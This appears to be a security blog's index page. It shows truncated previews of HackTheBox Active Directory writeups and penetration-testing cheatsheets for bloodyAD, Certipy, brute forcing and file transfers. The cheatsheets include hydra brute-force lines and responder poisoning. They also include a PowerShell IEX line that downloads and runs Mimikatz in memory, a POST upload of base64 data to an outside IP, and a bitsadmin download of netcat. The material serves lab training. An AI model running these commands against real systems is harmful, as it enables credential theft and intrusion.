HackTheBox - Infiltrator Writeup
Introduction: Infiltrator is an Insane-difficulty Windows Active Directory machine that demonstrates a sophisticated attack chain involving username enumeration, Kerberos exploitation, Windows Remote Management (WinRM), and Active Directory certificate services abuse. The machine showcases real-world attack scenarios including password cracking, privilege escalation through Active Directory permissions, and exploitation of misconfigured certificate templates. Attack Narrative: The penetration te...
HackTheBox - Puppy Writeup [VIE Language]
About
General information
IP Address: 10.10.11.70
Operating system (Distribution): Microsoft Windows Server 2022 Standard
Kernel: OS Version 10.0.20348 N/A Build 20348
Web server software and version: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Port Available: 53, 88, 111, 135, 139, 389, 445, 464, 593, 636, 2049, 3260, 3268, 3269, 5985
Enumeration (data gathering)
As is common in real life pentests, you will start the Puppy box with credentials for the following account: lev...
HackTheBox - DarkCorp Writeup
Introduction: This technical writeup details the penetration test of the “DarkCorp” machine from Hack The Box, rated as Insane difficulty. The assessment demonstrates a sophisticated attack chain involving a critical XSS vulnerability in Roundcube webmail, SQL injection in a dashboard application, Active Directory certificate services exploitation, and various privilege escalation techniques. Attack Narrative: The following sections provide a detailed chronological account of the penetration tes...
BloodyAD Cheatsheet
Author of post: SeriotonCTF
https://github.com/CravateRouge/bloodyAD

Installation

Using uv:

    uv tool install bloodyAD

Using pipx:

    pipx install bloodyAD

Retrieve User Information:

    bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

Add User To Group:

    bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Change Password:

    bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_pa...
ADCS Attack With Certipy
Author of post: 0pwn
https://github.com/ly4k/Certipy

Installation: https://github.com/ly4k/Certipy/wiki/04-%E2%80%90-Installation

Using pip:

    sudo apt update && sudo apt install -y python3 python3-pip
    python3 -m venv certipy-venv
    source certipy-venv/bin/activate
    pip install certipy-ad

Using pipx:

    pipx install -f "git+https://github.com/ly4k/Certipy.git"

Using uv:

    uv tool install git+https://github.com/ly4k/Certipy --force

Attacks: ESC1 ESC3 ESC4 ESC7 ESC8 ESC9 ESC13 ESC14 E...
HTB CPTS Cheatsheet - Attacking Common Applications
| Command | Description |
| --- | --- |
| `sudo vim /etc/hosts` | Opens the /etc/hosts with vim to start adding hostnames |
| `sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list` | Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) |
| `eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated>` | Runs eyewitness using a file generated by an nmap scan (web_discovery.xml) and cre... |
HTB CPTS Cheatsheet - Active Directory Enumeration And Attacks
Initial Enumeration

| Command | Description |
| --- | --- |
| `nslookup ns1.inlanefreight.com` | Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. |
| `sudo tcpdump -i ens224` | Used to start capturing network packets on the network interface specified after the -i option, from a Linux-based host. |
| `sudo responder -I ens224 -A` | Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified after the -I o... |
HTB CPTS Cheatsheet - Attacking Common Services
Attacking FTP

| Command | Description |
| --- | --- |
| `ftp 192.168.2.142` | Connecting to the FTP server using the ftp client. |
| `nc -v 192.168.2.142 21` | Connecting to the FTP server using netcat. |
| `hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142` | Brute-forcing the FTP service. |

Attacking SMB

| Command | Description |
| --- | --- |
| `smbclient -N -L //10.129.14.128` | Null-session testing against the SMB service. |
| `smbmap -H 10.129.14.128` | Network share enumeration using smbmap. |
| `smbmap -H 10.129.14.128 -r no`... | |
HTB CPTS Cheatsheet - Brute Forcing
Hydra

| Command | Description |
| --- | --- |
| `hydra -h` | hydra help |
| `hydra -C wordlist.txt SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - Combined Wordlist |
| `hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - User/Pass Wordlists |
| `hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"` | Login Form Brute Force - Static User, Pass Wordlist |
| `hydra -L bi`... | |
HTB CPTS Cheatsheet - File Transfers
| Command | Description |
| --- | --- |
| `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell |
| `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell |
| `Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64` | Upload a file with PowerShell |
| `bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe` | Download a file using Bitsadmin |
| `certutil.exe -verify`... | |







